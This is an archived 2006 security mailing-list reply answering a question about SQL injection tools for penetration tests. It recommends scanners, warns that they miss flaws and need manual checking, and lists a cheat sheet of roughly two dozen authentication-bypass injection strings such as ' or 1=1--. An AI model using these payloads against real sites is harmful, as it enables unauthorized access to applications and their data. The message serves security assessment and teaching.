From: Joseph McCray (joe@learnsecurityonline.com)
Date: Sat Oct 07 2006 - 21:11:53 EDT
Hey Juan good to see you bud.
Yeah there are a few open source SQL Injection scanners, but a lot of
them are blind sql injection scanners (meaning they are basically table
name bruteforcers) that you would use after you get the website to
generate the sql syntax error.
I've found wapiti to be a tool that I like:
http://wapiti.sourceforge.net/
There are some simpler scanners that also I like:
oedipus <--- Taken offline recently (Google is your friend).
simplescanner.pl
extendedscanner.pl
What seems to much more popular are the slq bruteforcers - man there are
tons of them. sqlninja.pl for example can even upload netcat (you gotta
love that).
The guy who's website I would recommend you check out is Justin Clarke
(http://www.justinclarke.com/) and definitely read his EuSecWest
Presentation
(http://www.justinclarke.com/archives/2006/07/eusecwest_slide.html).
Caveat:
Just because you run these scanners against a site and they come up
clean, DOES NOT mean that the site is not vuln to SQL Injection. These
scanners primarily look for SQL errors returned and if the error
returned (if there even is one) doesn't fit the regular expression that
it's looking for then you'll be off thinking the site is ok when it's
not. Custom error pages, and plenty of other things throw these types of
scanners of course.
This is exactly the discussion I was having with the class that I posted
about a few days ago that started all of the email traffic about
reporting vulns to companies. If it's a really big site, then I think
you should run multiple scanners against the site in question, and
manually verify the results.
I've had several cases where one tool will report one SQL Injection, and
other tools will not. I warn you that they are only a good "STARTING
POINT" to a thorough Web App Assessment.
Try to change the injections you use in the scanners as well. Here are a
few from my cheatsheet:
admin:' or a=a--
admin:' or 1=1--
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Whew...long email. Hope this helps...
Joe
On Sat, 2006-10-07 at 09:32 -0700, Juan B wrote:
> Hi,
>
> Is there a tool to use in pen test to do sql
> injections?
>
> thanks very much !
>
> Juan
>
> __________________________________________________
> Do You Yahoo!?
> Tired of spam? Yahoo! Mail has the best spam protection around
> http://mail.yahoo.com
>
> ------------------------------------------------------------------------
> This List Sponsored by: Cenzic
>
> Need to secure your web apps?
> Cenzic Hailstorm finds vulnerabilities fast.
> Click the link to buy it, try it or download Hailstorm for FREE.
> http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
> ------------------------------------------------------------------------
-- Joe McCray Toll Free: 1-866-892-2132 Email: joe@learnsecurityonline.com Web: https://www.learnsecurityonline.com Learn Security Online, Inc. * Security Games * Simulators * Challenge Servers * Courses * Hacking Competitions * Hacklab Access
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:09 EDT